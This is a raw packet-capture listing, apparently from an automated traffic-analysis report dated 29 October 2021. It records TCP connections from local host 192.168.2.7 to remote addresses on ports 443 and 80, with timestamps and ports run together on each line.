                                                                                                                          Oct 29, 2021 17:07:00.424827099 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.424879074 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.424885988 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.424900055 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.424928904 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.424936056 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.424961090 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.424966097 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.425009012 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.425015926 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425029039 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425057888 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.425065041 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425086975 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425097942 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.425132990 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.425143003 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425157070 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425210953 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.425215006 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425228119 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425273895 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.425276041 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425290108 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425333023 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.425344944 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425405979 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.425409079 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425422907 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425461054 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.425472975 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425523996 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425532103 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.425544024 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425570965 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.425574064 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425596952 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.425606012 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425623894 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425636053 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.425678968 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.425684929 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.425724030 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.441785097 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.441862106 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.441900015 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.441917896 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.441931963 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.441955090 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.441981077 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.441992044 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442004919 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442034960 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442045927 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442075968 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442086935 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442105055 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442114115 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442159891 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442188978 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442195892 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442220926 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442222118 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442276955 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442284107 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442300081 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442327023 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442332983 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442354918 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442365885 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442415953 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442418098 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442430973 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442480087 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442493916 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442547083 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442553043 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442564011 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442604065 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442610025 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442666054 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442670107 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442678928 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442717075 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442728996 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442764044 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442770958 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442790031 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442847967 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442854881 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442868948 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442925930 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442934036 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442946911 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.442977905 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.442985058 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443013906 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.443020105 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443075895 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.443084955 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443098068 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443133116 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.443140984 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443164110 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443175077 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.443207979 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.443214893 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443229914 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443258047 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.443267107 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443296909 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.443299055 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443345070 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443368912 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443370104 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.443388939 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443413019 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.443445921 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.443617105 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.443749905 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443790913 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443830013 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.443837881 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443866968 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.443902969 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443943977 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.443972111 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.443980932 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.444014072 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.444025993 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.444070101 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.444092035 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.444103956 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.444149017 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.446661949 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.447244883 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.458909988 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.458961010 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.459007978 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.459028006 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.459060907 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.459060907 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.459110022 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.459135056 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.459144115 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.459187984 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.459213972 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.459254980 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.459290028 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.459297895 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.459326029 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.459644079 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.459686995 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.459712029 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.459721088 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.459764957 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.459877014 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.459923029 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.459959030 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.459966898 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.460001945 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.460061073 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.460103035 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.460129976 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.460138083 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.460187912 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.460221052 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.460263968 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.460292101 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.460302114 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.460331917 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.460820913 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.460876942 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.460896969 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.460908890 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.460964918 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.461035967 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.461100101 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.471635103 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.471658945 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.471673965 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.471755981 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.471762896 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.471776009 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.471817970 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.471826077 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.471836090 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.471882105 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.471889973 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.471920013 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.471983910 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.480664968 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.480676889 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.480690002 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.480777979 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.480784893 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.480793953 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.480839968 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.480858088 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.480869055 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.480895996 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.480905056 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.480914116 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.480952978 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.480962038 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.481008053 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.481061935 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.481633902 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.481647968 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.481663942 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.481671095 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.481760979 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.481770039 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.481805086 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.481812000 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.481868982 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.483288050 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.483303070 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.483319044 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.483412981 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.483421087 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.483432055 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.483464003 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.483472109 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.483517885 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.483525038 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.483537912 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.483604908 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.483644009 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.486835003 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.486857891 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.486879110 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.486897945 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.486959934 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.486968994 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.487056971 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.488423109 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.488430023 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.488440990 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.488451004 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.488518953 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.488579988 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.488584995 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.488595963 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.488611937 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.488662958 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.488735914 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.488744020 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.488806963 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.492202044 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.492229939 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.492253065 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.492266893 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.492335081 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.492422104 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.492432117 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.492497921 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.494199991 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.494213104 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.494225979 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.494244099 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.494260073 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.494339943 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.494348049 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.494420052 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.494426012 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.494488001 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.494532108 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.505304098 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.505325079 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.505347967 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.505358934 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.505470991 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.505553961 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.506488085 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.506500006 CEST44349830162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:00.506583929 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.508487940 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.509651899 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:00.512156010 CEST49830443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:07:01.454164028 CEST4983380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:01.507910013 CEST8049833185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:01.508025885 CEST4983380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:01.508173943 CEST4983380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:01.508183956 CEST4983380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:01.590074062 CEST8049833185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:01.591491938 CEST4983380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:01.622519016 CEST4983380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:01.676155090 CEST8049833185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:01.733742952 CEST4983480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:01.788685083 CEST8049834185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:01.788790941 CEST4983480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:01.792001009 CEST4983480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:01.792023897 CEST4983480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:01.871345997 CEST8049834185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:01.873188972 CEST4983480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:01.873423100 CEST4983480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:01.913152933 CEST4983580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:01.928180933 CEST8049834185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:01.964584112 CEST8049835185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:01.964721918 CEST4983580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:01.964858055 CEST4983580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:01.964868069 CEST4983580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:07:02.016292095 CEST8049835185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:02.016585112 CEST8049835185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:02.041220903 CEST8049835185.98.87.159192.168.2.7
